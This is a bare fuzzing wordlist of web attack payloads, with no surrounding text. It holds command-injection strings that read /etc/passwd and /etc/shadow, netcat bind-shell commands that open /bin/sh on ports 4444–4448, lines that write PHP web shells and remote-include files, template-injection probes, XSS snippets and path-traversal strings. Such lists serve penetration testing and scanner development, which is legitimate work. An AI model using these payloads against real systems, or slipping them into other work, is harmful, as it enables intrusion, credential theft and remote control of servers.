exec%20
netstat -a
cat%20/etc/passwd
nid\n
/usr/bin/id
ls -al
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
ping 127.0.0.1
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
curl http
wget http
user=\`whoami\`"
pwd=\`pwd\`"
shadow=\`grep root /etc/shadow\`"
uname=\`uname -a\`"
shell=\`nc -lvvp 1234 
cat /etc/hosts
cat /etc/passwd
%0Acat%20/etc/passwd
{{ get_user_file("/etc/passwd") }}
/bin/cat /etc/passwd
/bin/cat /etc/shadow
cmd="/usr/bin/id
system('cat /etc/passwd')
php system("cat
dir C:\
dir C:\Documents and Settings\
C:\Users
echo%20'<script>alert(1)</script>'
echo "<?php include($_GET[
echo "<?php include($_GET['page'])| ?>" > rfi.php
echo "<?php system($_GET['cmd'])| ?>" > cmd.php
cmd.php
rfi.php
echo '<script>alert(1)</script>'
eval('echo XXXXXXXXXXXXXXXX
eval('ls')
eval('pwd')
eval('pwd');
eval('sleep 5')
eval('sleep 5');
eval('whoami')
eval('whoami');
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
exec('ls')
exec('pwd')
exec('pwd');
exec('sleep 5')
exec('sleep 5');
exec('whoami')
exec('whoami');
;{$_GET["cmd"]}
ifconfig
ipconfig
ls -l
ls -laR /etc
ls -l /home/
whoami
\nid|
\nid;
\nid\n
\n/usr/bin/id\n
-e /bin/sh
| nc -lvvp 4444 -e /bin/sh|
; nc -lvvp 4444 -e /bin/sh;
& nc -lvvp 4444 -e /bin/sh&
&& nc -lvvp 4444 -e /bin/sh &
nc -lvvp 4444 -e /bin/sh
nc -lvvp 4445 -e /bin/sh &
nc -lvvp 4446 -e /bin/sh|
nc -lvvp 4447 -e /bin/sh;
perl -e
nc -lvvp 4448 -e /bin/sh&
php system("echo
php system("curl
systeminfo
type C:\Windows
uname
which curl
which gcc
which nc
which netcat
which perl
which python
which wget
{{ get_user_file("C:\boot.ini") }}
{{ get_user_file("/etc/hosts") }}
{{4+4}}
{{4+8}}
{{person.secret}}
{{person.name}}
{1} + {1}
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
{{[] .__ Class __.__ base __.__ subclasses __ ()}}
../../../../../
page=../../
nano